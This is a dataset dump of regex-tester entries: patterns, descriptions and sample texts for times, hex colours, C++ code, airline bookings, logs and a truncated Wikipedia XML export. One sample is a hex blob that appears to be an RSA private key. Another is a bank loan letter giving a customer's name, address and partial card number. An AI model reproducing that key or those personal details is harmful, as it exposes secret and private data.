description
stringlengths
0
8.24k
regex
stringlengths
1
26.3k
text
stringlengths
0
2.47M
title
stringlengths
1
150
created_at
stringlengths
24
24
(?<=eyr:)20[0](?=\s|(\s\w+))
kjb .
2021-01-15T02:13:19.000Z
(?:(^[1-9]\d*)(\.\d*[1-9])?|(^0)(\.\d*[1-9]))([eE][+-](?!0+$)\d+)?$
123.4021203 0.11 00023123.1230000 0.101010101023e-124 010.000001 1230.123e+123 0.1e-1 1e-1 0e+2 0.e+2
numbers
2018-03-29T01:07:22.000Z
match if else statement in C++
if\s*\((?P<conditional>(?:(?:(?:"(?:(?:\\")|[^"])*")|(?:'(?:(?:\\')|[^'])*'))|[^\(\)]|\((?1)\))*+)\)\s*(?P<true_body>(?:{(?:(?:(?:"(?:(?:\\")|[^"])*")|(?:'(?:(?:\\')|[^'])*'))|[^{}]|{(?2)})*+})|(?:[^{}\n]*))\s*(?:(?:else\s+?(?!if)(?P<else_body>(?:{(?:(?:(?:(?:"(?:(?:\\")|[^"])*")|(?:'(?:(?:\\')|[^'])*'))|[^{}]|{(?3)})+)})|(?:[^{}\n])*)\s*)|(?:else\s*if\s*\((?P<else_if_condition>(?:(?:(?:"(?:(?:\\")|[^"])*")|(?:'(?:(?:\\')|[^'])*'))|[^\(\)]|\((?4)\))+)\)\s*(?P<else_if_body>(?:(?:{(?:(?:(?:"(?:(?:\\")|[^"])*")|(?:'(?:(?:\\')|[^'])*'))|[^{}]|{(?5)})+})|(?:[^{}\n]*)))\s*))*
// in_out.cpp: определяет точку входа для консольного приложения. #include "stdafx.h" #include <iostream> using namespace std; int main() { int a, b; // объявление переменных типа int, то есть в таких переменных хранятся только целые числа cout << "Vvedite pervoe chislo: "; cin >> a; cout << "Vvedite vtoroe chislo: "; cin >> b; if (a > b) cout << a << " > " << b << endl; // печатать данное сообщение if (a < b and c ==k or (s == f && f==d)) { cout << a << " < " << b << endl; cout << a << " < " << b << endl; cout << a << " < " << b << endl; cout << a << " < " << b << endl; cout << a << " < " << b << endl; cout << a << " < " << b << endl; if (sdfsdf) { sdfsdf } cout << a << " < " << b << endl; cout << a << " < " << b << endl; cout << a << " < " << b << endl; } if (a == b) // если а = b cout << a << " = " << b << endl; // в теле условного оператора опущены фигурные скобочки system("pause"); return 0; } if (a <b) { cout << a << " < " << b << endl; } if (a <b cvxcv sdfsd sdfsd sdfds ) { cout << a << " < " << b << endl; } else { dsfsdfsdf } if (var1 == "("){ echo "{в"; } if(boolean_expression 1) { // Executes when the boolean expression 1 is true } else if(boolean_expression 2) { // Executes when the boolean expression 2 is true } else if( boolean_expression 3) { // Executes when the boolean expression 3 is true } else { // executes when the none of the above condition is true. }
if else statement in C++
2015-12-29T14:11:10.000Z
^([0-1]\d:[0-5]\d)|(^2[0-3]:[0-5]\d)
00:00 01:00 02:00 03:00 04:00 05:00 06:00 07:00 08:00 09:00 10:00 11:00 12:00 12:09 12:19 12:29 12:30 12:31 12:32 12:33 12:34 12:35 midday (all days of week) 12:36 13:00 14:00 15:00 16:00 17:00 18:00 19:00 19:35 evening (sun-fri) 20:00 20:05 evening (saturday) 20:15 20:25 20:35 21:00 22:00 23:00 23:59
match time all the way up to 23:59.
2016-04-23T00:06:24.000Z
Validates hexadecimal color codes based on the following rule set: - Optionally starting with a hash. - 3 or 6 characters in length. - Using the [0-9a-f] character set.
^#?([0-9a-f]{6}|[0-9a-f]{3})$
#ffffff
Validate hex color
2015-12-02T11:14:43.000Z
(\d*).html
http://www.lacentrale.fr/auto-occasion-annonce-22885696.html
test
2014-01-15T14:52:11.000Z
([\d.]*) . . \[([\w/]*):([\w:]*) [\+\w]*] \"[\w]* [\W\w\s]* *\"*(www.*\w*.*\w{2})* [\w\W]*\" (\w*) (\w*) \"[\w\W]*(https://www\.\w*\.\w{2})[\W][^\s]* *\" *\"([^\s]*) [(\W\w]([\w\W)]*)\) *([^\"]*)\)*[\w]*.*
2.177.12.140 - - [22/Jan/2019:03:56:36 +0330] "GET /m/filter/b1,b103 HTTP/1.1" 200 4911 "https://www.zanbil.ir/m/product/33606/%D8%AA%D9%84%D9%88%DB%8C%D8%B2%DB%8C%D9%88%D9%86-%D8%A7%D9%84-%D8%A7%DB%8C-%D8%AF%DB%8C-%D8%B3%D8%A7%D9%85%D8%B3%D9%88%D9%86%DA%AF-%D9%85%D8%AF%D9%84-55NU8950-Ultra-HD-4K" "Mozilla/5.0 (Android 7.1.1; Mobile; rv:64.0) Gecko/64.0 Firefox/64.0" "-"
1G
2020-12-18T22:25:37.000Z
Match ESET Web/Parental Control Module domains for exclusion from DNS logs
^h[1,3,5]\-arsp0[1,2]\-v\.eset\.com$
h1-arsp01-v.eset.com h1-arsp02-v.eset.com h3-arsp01-v.eset.com h3-arsp02-v.eset.com h5-arsp01-v.eset.com h5-arsp02-v.eset.com
ESET Web/Parental Control Module domains (DNS)
2023-06-13T13:52:37.000Z
2 different linux logs parsed by one regex
(?:[^:\n]*:){4}\w+\s(?P<logHost>\S+)(?:(\s+\w+-)|(\s+))(?P<tst>(\w+))(?:.*)user\s+(?P<username>\S+)
11:58:33 11:58:33 CLAY.GYM.we223 systemd-logind0: new session 548 of user my.test. 11:58:33 11:58:33 CLAY.GYM.we223 sshd0[53425]: pam_unix(sshd:session): session open for user my.test by (uid=0) 11:58:33 11:58:33 CLAY.GYM.we223 systemd-logind1: new session 548 of user my.test. 11:58:33 11:58:33 CLAY.GYM.we223 sshd1[53425]: pam_unix(sshd:session): session open for user my.test by (uid=0)
Different logs single regex
2020-12-01T14:11:27.000Z
Personal Regex to find Industrial NOI pdfs
(?i)(?:noi)(?<space>(?:.*-.*))(?:csn\k<space>)?(?<noiNum>(?:txr12\w{3}f)|(?:txr15\d{7}))?(?:\k<space>)?(?<projName>(?:\b[\w\s\-\&]+?\b))(?:\k<space>).*?(?<noiNum2>(?:(?:trx12\w{3}f)|(?:txr15\d{7})))?(?:\.pdf)$
NOI - CSN - Riata Unit 5C - elec. - Fuquay - TXR150022379.pdf
Test NOI
2015-12-24T02:29:35.000Z
jjj[0-9]+(\.[0-9][0-9]?)
03-Feb-2021 Mr./Ms. JOHN THACHIL MADHURA SURAKSHA APARTMENT S6 2ND FLOOR JP NAGAR 5TH PHASE BANGALORE 560078 Dear Customer, Subject: EasyEMI on your HDFC Bank Credit Card Number:jjj552260XXXXXX0961 We are pleased to grant you the EasyEMI payment facility as per the details stated below. The transaction amount has been converted into EasyEMI as per your request EasyEMI Loan no. 0000000000065214714 Unsecured Loan Type EasyEMI Amount Rs.3399.00 Tenure 3 Months EasyEMI Fixed Finance Charges on Reducing Balance 1.25% p.m. EMI Amount Rs.1161.44(Excluding GST)* Merchant Name Processing Fee Rs.199.00 *GST at 18% will be charged on the following and are subjected to change as per Govt.Announcement: 1.EasyEMI Finance Charges Component on the EMI amount on a monthly basis 2.Processing fee, if any 3.Pre-closure charges, if any Please refer to the enclosed amortization schedule for EMI details For the first EMI, the interest will be calculated from the loan booking date till the payment due date. This is effective only for loans booked from Feb 2019 onwards.In case you require any further assistance , pls contact Phone Banking within 7 days of receiving this letter EasyEMI transactions are not eligible for Reward Points.This EasyEMI can be pre-closed anytime during the tenure. In case of pre-closure of the EasyEMI facility, there will be no Penalty levied currently. As the pre-closure charge is subjected to change, we request you to get in touch with your nearest call centre for the applicable charge, if any, if you decide to pre-close the EasyEMI. Partial pre-payment or partial closure is not permitted on this loan Additional Finance Charges if any on the principal outstanding from last statement date till date of loan pre- closure need to be paid by customer. Please also note that the above mentioned EMI amounts will be included to your monthly HDFC Bank Credit Card statements and will be payable as part of the Minimum Amount Due. If your HDFC Bank Card gets closed before all the installments have been charged, the loan outstanding will get debited to your card account and you’re expected to pay the amount in full. In case of default in payment of credit card dues or EMIs by the due dates, your card account is liable to be suspended and could further be terminated. The terms and conditions contained in the Cardmember Agreement apply over and above the terms and conditions for this loan. In case you do not agree to any of the details above, or require any further assistance, please contact the nearest customer service call centre at the numbers provided below, within 7 days of receiving this letter. Enclosed Amortization schedule of Loan Number 0000000000065214714 for Loan Amount Rs.3399.00 (*GST extra @18% on Interest Component) NojjjNo EasyEMIjjjEasyEMI StatementjjjPrincipaljjjEMIjjjBalancejjjStatementjjjPrincipaljjjEMIjjjBalance FinancejjjFinance DatejjjAmountjjjAmountjjjDatejjjAmountjjjAmount ChargesjjjCharges onjjjon ReducingjjjReducing BalancejjjBalance 21-02-2021jjj21-04-2021 1jjj1118.96jjj70.88jjj1189.84jjj2280.04jjj3jjj1147.10jjj14.33jjj1161.43jjj0.00 21-03-2021 2jjj1132.94jjj28.50jjj1161.44jjj1147.10 This is a computer generated letter and does not require a signature.
Number from Statments
2021-02-27T09:28:08.000Z
Oltre a supportare le omocodie controlla in modo restrittivo il carattere relativo al mese di nascita
[A-Z]{6}[0-9LMNPQRSTUV]{2}[ABCDEHLMPRST]{1}[0-7LMNPQRST]{1}[0-9LMNPQRSTUV]{1}[A-Z]{1}[0-9LMNPQRSTUV]{3}[A-Z]{1}
Codice fiscale italiano
2015-10-09T09:14:46.000Z
(zbx|zorbix)_(?:(?!(blog|helper)).)*::
$pixo_blog['post_classes'] = ''; $pixo_blog['layout'] = zbx_helper::get_mb_or_option('blog-layout', 'classic'); $pixo_blog['sidebar'] = zbx_settings::get_mb_or_option('sidebar'); $pixo_blog['sidebar'] = zorbix_settings::get_mb_or_option('sidebar');
only contains selected static classes
2016-02-01T08:46:13.000Z
Checks if a string ends with digits
.*?([0-9]+)$
3434d2323
End with digits
2016-09-20T16:02:35.000Z
(\d+)\s+(\w{2})\s*(\w{2,5})\s+(\w{5})(\s+|\s+.\s+)(\w{3})(\w{3})(\s+|(\s|\*)\w{3}\s+)(\w{4,5})\s+(\w{4,5})\s+(\w{5})?(\s|.)*(?:\n|$){1}
1 UA 990J 28OCT SFOCDG 340P 1015A 29OCT fefeff 2 AF1830J 31OCT CDGMXP 900A 1025A 31OCT OPERATED BY AIR CANADA YYZ CHECK-IN WITH AIR CANADA 3 LH 259J 03NOV T MXPFRA 740A 900A 03NOV OPERATED BY LUFTHANSA MAD CHECK-IN WITH LUFTHANSA 4 DL2252Z 01OCT T SATDTW*SS1 1246P 454P 5 DL 98Z 01OCT T DTWCDG*SS1 608P 805A 02OCT W /DCDL /E 6 DL8322Z 02OCT W CDGBOD*SS1 935A 1050A /DCDL /E OPERATED BY AIR FRANCE 7 DL9365Z 09OCT W BODAMS*SS1 1150A 140P /DCDL /E OPERATED BY KLM ROYAL DUTCH AIRLINES 8 DL8178Z 09OCT W AMSSLC*SS1 500P 655P /DCDL /E OPERATED BY KLM ROYAL DUTCH AIRLINES 10 LH 454J 03NOV FRASFO 1005A 205P 03NOV 11 LH 454J 03NOV SFOKIV 205P 235P 03NOV
Sabre
2018-11-27T15:04:13.000Z
(\w{2})
308204BF020100300D06092A864886F70D0101010500048204A9308204A50201 000282010100A9CB5B5A9C012B67FE9184A886824843D5AFD01192B48E8D228F CFC4131A27A5B19F55507EFC72E2D9C4FB6DA86CA22310E03C5DFB54A54A1034 16160127712051DB0CDEEF32D32D50B9EFA98563AD4070A793C0621B6ED17FD5 45632788FE638A6F53E8686DECFE689E2547D9647F41FA8A5AF7368090420C0A 100B80A7876A165C537FC91047883285FA2DB31320A3A47D4009C5367C6B6B38 34D889565C7DA7D1F7B44CA90B4E45201E775F909738FD608A3D644EEE720E14 1EB917BF326CA13C2B32B43608CC83CFFC67B90FC1D6AFD28C826F4F9DE39288 188173EB0BB51C02B8FF0116411893C222875151BBA0259D6258296A480837E7 FC3F097F23C90203010001028201003339191F35AF18A42FE5408B02C12D01E1 E63F33FDF920842D680B3AD0B4743F855D570488BAAA020BC6643F89AEF41EF6 095FCCCE7493C4CB2C9B7919F2072BC3E5FC7508DE615CEB5C9C939C9D1C7833 442ACBC00D1C9A71212AE4A5D9AB3CE6577D8DC06B6132C2E6EAC249300B4021 5039EF186F2295FA41D2E35575B4E0EB7D68517F39D5A2EDDB8ACED8A7E49ADA E5F4F9A185639261B9007CDCC1F42990B0039B55112387DF17583A32F4D3712F E35C73069EE2B73AE63F73EF52B31E5EC8AD4D53D07A330D687B894877676345 092B4F6DE5C9C3C9BBAC05CC02CF5F8318EFA0E95892F25E3A804CA02E17160D 70B2BE2EB45807139E269A6B9EFC6D02818100CD86015BE7DCA8E0204D73D96A 4A4467681D87147BEF96AFCDD39536A4759AD7CF816876298D35563D2D862E52 0EC7D848C8AA53F8B85D1FDF1D3538919F0C639ADA67B3EBD3ED4C4317E674FA D627E041A37B406F04F09892B703288AA30EA60793F582CED515FC4520F1AE43 E718667262F027D7520E238194AF29FB9C056302818100D37EEF8066A10F69BB 5B97CA9977F4C9D82B7707ECE0BF54D095E392DBA2A1B941A0D90E66B14A313A 780C65F6BE63CA5F3491F20109C041C8726BC5A856F09C1E4F45BDE0CB10D9C4 E9F33FFAB92B66D4289D5CF83C2DE339BA73F7942A19556F3EF6526CF156AEA5 65CA5269042610D0CE2B9BFE1AFCD2F057F5A941D13FE302818100AA12321DB3 88CDD669E4ADF1441BA0EF5120DE1EFD500E09FCF11190DE16D3C3B25B0BEE7C 03F6171F1904E85FCF0B60D719F698F640DA0EFDBA55C831F8C36FC93CE283E8 AABEBB54E9FA32E33F44503700E98530598E1F33896E7BA5FDB8A97BABDC861A 520A976F3D0BC1813F42D9C3DE4B8D2C89225A0F68D26A936350B102818100A0 EEED362A62124565610BFF098AC305386DD294804680B0FC4BA230E4DA3AEFAA 25C824F235A3FC13BEB7C87ADA633AE1F931B911DB26A5A7EE915D857C2A78D1 8386D13695AECBD6D022DE235DF5CDB850F375841ADEDC11D87458073185B782 004A156C7AB4780EB9871BF0774CB3ECFF85259D5551DEFD2E216BDAFE6BFB02 818100BCF51782BBC9C4689771CFCAFD06654068E23D9879D0F3AC3D4A9B481B 06AFB8422E16FB96471D9340987603008BFC067B2214CEE3AFC036D01A765579 67C28DD9C5541FA0A8A5FAD7DF884B3DCE17A8BC34E7E3E2276457380C44BA79 3CD92EA71693F1B1DC31AC18F5C37CE9C8A2496297F5DEBC3313ED1F92EC0F68 652261
Hex to bytes array
2021-01-04T12:42:07.000Z
intended to clean websites form input or crawled data stripping all the html of xml tags and inside attributes
<.*?>
<div id="lorem" class="ipsum">Hello World</div><div class="lorem">Ciao mondo<a href="#">clicca qui</a></div><div id="lorem" class="ipsum">Hello World</div><div class="lorem">Ciao mondo<a href="#">clicca qui</a></div>
match all html/xml tags and attributes
2018-12-28T15:11:11.000Z
[^\P{P}-]+
Hello, I am Ed. I am amazing!!! Look!? What do you mean????? If anything, I think that it's high time to test sentences like this; dont you?!
testing regex to indicate punctuation
2016-01-20T02:13:39.000Z
^(?!first-blacklisted-file)(?!second-blacklisted-file)$
RegExp black list example usage
2015-01-20T09:57:00.000Z
(?:'(views\/[^']*)'|"(views\/[^"]*)")
return { dayNames: $(dayKeys).map(function(i, val){ return Console.globalize.globalizeMessage("views/common/dates/days/full/" + val); }).toArray(), dayNamesMin: $(dayKeys).map(function(i, val){ return Console.globalize.globalizeMessage("views/common/dates/days/abrv/" + val); }).toArray(), monthNames: $(monthKeys).map(function(i, val){ return Console.globalize.globalizeMessage("views/common/dates/months/full/" + val); }).toArray(), monthNamesShort: $(monthKeys).map(function(i, val){ return Console.globalize.globalizeMessage("views/common/dates/months/abrv/" + val); }).toArray(), hourText: Console.globalize.globalizeMessage("views/common/dates/text/hour"), minuteText: Console.globalize.globalizeMessage("views/common/dates/text/minute"), secondText: Console.globalize.globalizeMessage("views/common/dates/text/second"), millisecText: Console.globalize.globalizeMessage("views/common/dates/text/millisecond"), microsecText: Console.globalize.globalizeMessage("views/common/dates/text/microsecond"), timeSuffix: Console.globalize.globalizeMessage("views/common/dates/text/time-suffix"), yearSuffix: Console.globalize.globalizeMessage("views/common/dates/text/year-suffix"), timeText: Console.globalize.globalizeMessage("views/common/dates/text/time"), timeOnlyTitle: Console.globalize.globalizeMessage("views/common/dates/text/time-only-title"), currentText: Console.globalize.globalizeMessage("views/common/dates/text/now"), closeText: Console.globalize.globalizeMessage("views/common/dates/text/close"), closeText: Console.globalize.globalizeMessage('views/common/dates/text/close') };
Regex String starting with * wrapped in single or double quotes
2017-04-25T20:51:45.000Z
find ids of video in dailymotion urls in text
(?:https?:\/\/)?(?:www\.)?dai\.?ly(motion)?(?:\.com)?\/?.*(?:video|embed)?(?:.*v=|v\/|\/)([a-z0-9]+)
dailymotion http://dai.ly/x578has http://www.dailymotion.com/video/x578has_plus-difficile-que-la-pate-feuillete-et-la-frangipane-la-decoration-de-la-galette_lifestyle http://dai.ly/x578has Plus difficile
Dailymotion videos ids
2017-01-03T17:45:55.000Z
(.*)([\/](\w+))(\.(jpg|png|gif|jpeg))
https://res.cloudinary.c…640px_qv2lzl.jpg
take the public id from image cloudinary
2019-02-01T18:59:05.000Z
Text to sentence is easy, but not when there are URLs or website names inside the text.
([^\.!\?|\{\}]+[\.!\?]+(?:[a-z]+[\.!\?]+)?)
<h3>{h3A1 | h3B1 | h3C1 | h3D1 | h3E1 | h3F1 }</h3> {<h5>{h5A|h5B|h5C|h5D|h5E}</h5>|} <p>{ {pA1. |pB1. } {pC1. |pD1. } {pE1. |pF1. } | {ppA2. |ppB2. } {ppC2. |ppD2. } {ppE2.|ppF2. } }</p> {<h5>{A|B|C|D|E}</h5>|} <p>{{A. |B. } {C. |D. } {E. |F. }|{A. |B. } {C. |D.} {E. |F. }}</p> {<h5>{Getting the Best Google Maps Driving Directions | A History of Google Maps Driving Directions Refuted | The War Against Google Maps Driving Directions | If You Read Nothing Else Today, Read This Report on Google Maps Driving Directions | Facts, Fiction and Google Maps Driving Directions | What's Really Happening with Google Maps Driving Directions}</h5>|} <p>{{Whenever you would like to travel, the greatest worry is to receive the place quickly with the finest route. |It is a very major world and it's also quite easy to get lost in it if you really do not have precise directions on where you're going. } {When you're going to a certain address, you'll need to get an elaborated map of that particular location so you are able for exact and dependable directions to navigate your journey with nominal problems. |You might also want to search the country of Japan to choose where you want to see, just by typing in 'Japan'. } {You can chose directions predicated on travel time or travel distance along with the web site will calculate a number of different routes if you're not happy with the initial one provided. |Not to worry, I've developed an application that may be placed on nearly every site and generate a map and driving directions. }|{Gone are the times when you really need to hold a map in your hand to understand where you're going. |This is really a subject that everybody should know something about and within this article you'll be able to find out a number of the simple details you may need.} {This may save you quite a modicum of time in the event you frequently are looking up driving directions. |If you save that link for a bookmark or inside a Word document, then you are going to have the ability to access exactly the same group of directions for next time.} {If you're not close to the phone or have a voicemail system, you need to select postcard verification. |You're able to get to your own destination stress free, and truly feel great.}}</p> <p>{Now say you're in the auto driving but do not have any idea exactly where you are. |I like the simple to read instructions. } {It even lets you know how far it is to the following turn. |Hence you might lose out on brand new, short, alternate paths. } {Unfortunately there's not a established answer for this particular question. |Ergo, just since you might need to have a few detours on the way, so you could need to change your life roadmap from now and then. } {Don't forget, though, your fellow won't have a memory of the tiny incident. |This is helpful to recognize whenever you're approaching turns or exits and gives a major advantage on a standard map such as the ones you will discover with MapQuest.com. } {We're presented with detailed directions and possibly even pictures to create the trip as painless as possible. |But however this might not be the least path. }</p>
Text to Sentence with URLs
2016-04-19T20:39:51.000Z
Testing Franklin related regex matching cases.
(Franklin,\s|franklin,\s)
Franklin, can you please do this or this for me? franklin, can you please do this or this for me? Franklin, can you please remind me to do X at 0:00pm? franklin, can you please remind me to do X at 0:00pm?
Franklin Regex
2015-10-02T22:33:00.000Z
MailCleaner attachment name expression.
(Attached file: )(.....)\....$
Attached file: 79349.doc
"Attached file" Virus
2016-03-29T15:55:55.000Z
^raw_data\.(?!((event_record_string|event_record_binary|event_record_binary\.event_record_binary)\.prod\.(18477|18478|5416|5454|5455)|storage\.aw|codo)\.)(?!.*(failure_permanent|failure_\d+_\w+)$).*
raw_data.foo.bar
faa
2015-06-12T23:07:14.000Z
<namespace\b[^>|^\/>]*>(.*?)<\/namespace>
<mediawiki xmlns="http://www.mediawiki.org/xml/export-0.3/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.mediawiki.org/xml/export-0.3/ http://www.mediawiki.org/xml/export-0.3.xsd" version="0.3" xml:lang="en"> <siteinfo> <sitename>Wikipedia</sitename> <base>http://en.wikipedia.org/wiki/Main_Page</base> <generator>MediaWiki 1.6alpha</generator> <case>first-letter</case> <namespaces> <namespace key="-2">Media</namespace> <namespace key="-1">Special</namespace> <namespace key="0" /> <namespace key="1">Talk</namespace> <namespace key="2">User</namespace> <namespace key="3">User talk</namespace> <namespace key="4">Wikipedia</namespace> <namespace key="5">Wikipedia talk</namespace> <namespace key="6">Image</namespace> <namespace key="7">Image talk</namespace> <namespace key="8">MediaWiki</namespace> <namespace key="9">MediaWiki talk</namespace> <namespace key="10">Template</namespace> <namespace key="11">Template talk</namespace> <namespace key="12">Help</namespace> <namespace key="13">Help talk</namespace> <namespace key="14">Category</namespace> <namespace key="15">Category talk</namespace> <namespace key="100">Portal</namespace> <namespace key="101">Portal talk</namespace> </namespaces> </siteinfo> <page> <title>AaA</title> <id>1</id> <revision> <id>32899315</id> <timestamp>2005-12-27T18:46:47Z</timestamp> <contributor> <username>Jsmethers</username> <id>614213</id> </contributor> <text xml:space="preserve">#REDIRECT [[AAA]]</text> </revision> </page> <page> <title>AlgeriA</title> <id>5</id> <revision> <id>18063769</id> <timestamp>2005-07-03T11:13:13Z</timestamp> <contributor> <username>Docu</username> <id>8029</id> </contributor> <minor /> <comment>adding cur_id=5: {{R from CamelCase}}</comment> <text xml:space="preserve">#REDIRECT [[Algeria]]{{R from CamelCase}}</text> </revision> </page> <page> <title>AmericanSamoa</title> <id>6</id> <revision> <id>18063795</id> <timestamp>2005-07-03T11:14:17Z</timestamp> <contributor> <username>Docu</username> <id>8029</id> </contributor> <minor /> <comment>adding to cur_id=6 {{R from CamelCase}}</comment> <text xml:space="preserve">#REDIRECT [[American Samoa]]{{R from CamelCase}}</text> </revision> </page> <page> <title>AppliedEthics</title> <id>8</id> <revision> <id>15898943</id> <timestamp>2002-02-25T15:43:11Z</timestamp> <contributor> <ip>Conversion script</ip> </contributor> <minor /> <comment>Automated conversion</comment> <text xml:space="preserve">#REDIRECT [[Applied ethics]] </text> </revision> </page> <page> <title>AccessibleComputing</title> <id>10</id> <revision> <id>15898945</id> <timestamp>2003-04-25T22:18:38Z</timestamp> <contributor> <username>Ams80</username> <id>7543</id> </contributor> <minor /> <comment>Fixing redirect</comment> <text xml:space="preserve">#REDIRECT [[Accessible_computing]]</text> </revision> </page> <page> <title>AdA</title> <id>11</id> <revision> <id>15898946</id> <timestamp>2002-09-22T16:02:58Z</timestamp> <contributor> <username>Andre Engels</username> <id>300</id> </contributor> <minor /> <text xml:space="preserve">#REDIRECT [[Ada programming language]]</text> </revision> </page> <page> <title>Anarchism</title> <id>12</id> <revision> <id>42136831</id> <timestamp>2006-03-04T01:41:25Z</timestamp> <contributor> <username>CJames745</username> <id>832382</id> </contributor> <minor /> <comment>/* Anarchist Communism */ too many brackets</comment> <text xml:space="preserve">{{Anarchism}} '''Anarchism''' originated as a term of abuse first used against early [[working class]] [[radical]]s including the [[Diggers]] of the [[English Revolution]] and the [[sans-culotte|''sans-culottes'']] of the [[French Revolution]].[http://uk.encarta.msn.com/encyclopedia_761568770/Anarchism.html] Whilst the term is still used in a pejorative way to describe ''&quot;any act that used violent means to destroy the organization of society&quot;''&lt;ref&gt;[http://www.cas.sc.edu/socy/faculty/deflem/zhistorintpolency.html History of International Police Cooperation], from the final protocols of the &quot;International Conference of Rome for the Social Defense Against Anarchists&quot;, 1898&lt;/ref&gt;, it has also been taken up as a positive label by self-defined anarchists. The word '''anarchism''' is [[etymology|derived from]] the [[Greek language|Greek]] ''[[Wiktionary:&amp;#945;&amp;#957;&amp;#945;&amp;#961;&amp;#967;&amp;#943;&amp;#945;|&amp;#945;&amp;#957;&amp;#945;&amp;#961;&amp;#967;&amp;#943;&amp;#945;]]'' (&quot;without [[archon]]s (ruler, chief, king)&quot;). Anarchism as a [[political philosophy]], is the belief that ''rulers'' are unnecessary and should be abolished, although there are differing interpretations of what this means. Anarchism also refers to related [[social movement]]s) that advocate the elimination of authoritarian institutions, particularly the [[state]].&lt;ref&gt;[http://en.wikiquote.org/wiki/Definitions_of_anarchism Definitions of anarchism] on Wikiquote, accessed 2006&lt;/ref&gt; The word &quot;[[anarchy]],&quot; as most anarchists use it, does not imply [[chaos]], [[nihilism]], or [[anomie]], but rather a harmonious [[anti-authoritarian]] society. In place of what are regarded as authoritarian political structures and coercive economic institutions, anarchists advocate social relations based upon [[voluntary association]] of autonomous individuals, [[mutual aid]], and [[self-governance]]. While anarchism is most easily defined by what it is against, anarchists also offer positive visions of what they believe to be a truly free society. However, ideas about how an anarchist society might work vary considerably, especially with respect to economics; there is also disagreement about how a free society might be brought about. == Origins and predecessors == [[Peter Kropotkin|Kropotkin]], and others, argue that before recorded [[history]], human society was organized on anarchist principles.&lt;ref&gt;[[Peter Kropotkin|Kropotkin]], Peter. ''&quot;[[Mutual Aid: A Factor of Evolution]]&quot;'', 1902.&lt;/ref&gt; Most anthropologists follow Kropotkin and Engels in believing that hunter-gatherer bands were egalitarian and lacked division of labour, accumulated wealth, or decreed law, and had equal access to resources.&lt;ref&gt;[[Friedrich Engels|Engels]], Freidrich. ''&quot;[http://www.marxists.org/archive/marx/works/1884/origin-family/index.htm Origins of the Family, Private Property, and the State]&quot;'', 1884.&lt;/ref&gt; [[Image:WilliamGodwin.jpg|thumb|right|150px|William Godwin]] Anarchists including the [[The Anarchy Organisation]] and [[Murray Rothbard|Rothbard]] find anarchist attitudes in [[Taoism]] from [[History of China|Ancient China]].&lt;ref&gt;The Anarchy Organization (Toronto). ''Taoism and Anarchy.'' [[April 14]] [[2002]] [http://www.toxicpop.co.uk/library/taoism.htm Toxicpop mirror] [http://www.geocities.com/SoHo/5705/taoan.html Vanity site mirror]&lt;/ref&gt;&lt;ref&gt;[[Murray Rothbard|Rothbard]], Murray. ''&quot;[http://www.lewrockwell.com/rothbard/ancient-chinese.html The Ancient Chinese Libertarian Tradition]&quot;'', an extract from ''&quot;[http://www.mises.org/journals/jls/9_2/9_2_3.pdf Concepts of the Role of Intellectuals in Social Change Toward Laissez Faire]&quot;'', The Journal of Libertarian Studies, 9 (2) Fall 1990.&lt;/ref&gt; [[Peter Kropotkin|Kropotkin]] found similar ideas in [[stoicism|stoic]] [[Zeno of Citium]]. According to Kropotkin, Zeno &quot;repudiated the omnipotence of the state, its intervention and regimentation, and proclaimed the sovereignty of the moral law of the individual&quot;. &lt;ref&gt;[http://www.blackcrayon.com/page.jsp/library/britt1910.html Anarchism], written by Peter Kropotkin, from Encyclopaedia Britannica, 1910]&lt;/ref&gt; The [[Anabaptist]]s of 16th century Europe are sometimes considered to be religious forerunners of modern anarchism. [[Bertrand Russell]], in his ''History of Western Philosophy'', writes that the Anabaptists &quot;repudiated all law, since they held that the good man will be guided at every moment by [[the Holy Spirit]]...[f]rom this premise they arrive at [[communism]]....&quot;&lt;ref&gt;[[Bertrand Russell|Russell]], Bertrand. ''&quot;Ancient philosophy&quot;'' in ''A History of Western Philosophy, and its connection with political and social circumstances from the earliest times to the present day'', 1945.&lt;/ref&gt; [[Diggers (True Levellers)|The Diggers]] or &quot;True Levellers&quot; were an early communistic movement during the time of the [[English Civil War]], and are considered by some as forerunners of modern anarchism.&lt;ref&gt;[http://www.zpub.com/notes/aan-hist.html An Anarchist Timeline], from Encyclopaedia Britannica, 1994.&lt;/ref&gt; In the [[modern era]], the first to use the term to mean something other than chaos was [[Louis-Armand de Lom d'Arce de Lahontan, Baron de Lahontan|Louis-Armand, Baron de Lahontan]] in his ''Nouveaux voyages dans l'Amérique septentrionale'', (1703), where he described the [[Native Americans in the United States|indigenous American]] society, which had no state, laws, prisons, priests, or private property, as being in anarchy&lt;ref&gt;[http://etext.lib.virginia.edu/cgi-local/DHI/dhi.cgi?id=dv1-12 Dictionary of the History of Ideas - ANARCHISM]&lt;/ref&gt;. [[Russell Means]], a [[libertarian]] and leader in the [[American Indian Movement]], has repeatedly stated that he is &quot;an anarchist, and so are all [his] ancestors.&quot; In 1793, in the thick of the [[French Revolution]], [[William Godwin]] published ''An Enquiry Concerning Political Justice'' [http://web.bilkent.edu.tr/Online/www.english.upenn.edu/jlynch/Frank/Godwin/pjtp.html]. Although Godwin did not use the word ''anarchism'', many later anarchists have regarded this book as the first major anarchist text, and Godwin as the &quot;founder of philosophical anarchism.&quot; But at this point no anarchist movement yet existed, and the term ''anarchiste'' was known mainly as an insult hurled by the [[bourgeois]] [[Girondins]] at more radical elements in the [[French revolution]]. ==The first self-labelled anarchist== [[Image:Pierre_Joseph_Proudhon.jpg|110px|thumb|left|Pierre Joseph Proudhon]] {{main articles|[[Pierre-Joseph Proudhon]] and [[Mutualism (economic theory)]]}} It is commonly held that it wasn't until [[Pierre-Joseph Proudhon]] published ''[[What is Property?]]'' in 1840 that the term &quot;anarchist&quot; was adopted as a self-description. It is for this reason that some claim Proudhon as the founder of modern anarchist theory. In [[What is Property?]] Proudhon answers with the famous accusation &quot;[[Property is theft]].&quot; In this work he opposed the institution of decreed &quot;property&quot; (propriété), where owners have complete rights to &quot;use and abuse&quot; their property as they wish, such as exploiting workers for profit.&lt;ref name=&quot;proudhon-prop&quot;&gt;[[Pierre-Joseph Proudhon|Proudhon]], Pierre-Joseph. ''&quot;[http://www.marxists.org/reference/subject/economics/proudhon/property/ch03.htm Chapter 3. Labour as the efficient cause of the domain of property]&quot;'' from ''&quot;[[What is Property?]]&quot;'', 1840&lt;/ref&gt; In its place Proudhon supported what he called 'possession' - individuals can have limited rights to use resources, capital and goods in accordance with principles of equality and justice. Proudhon's vision of anarchy, which he called 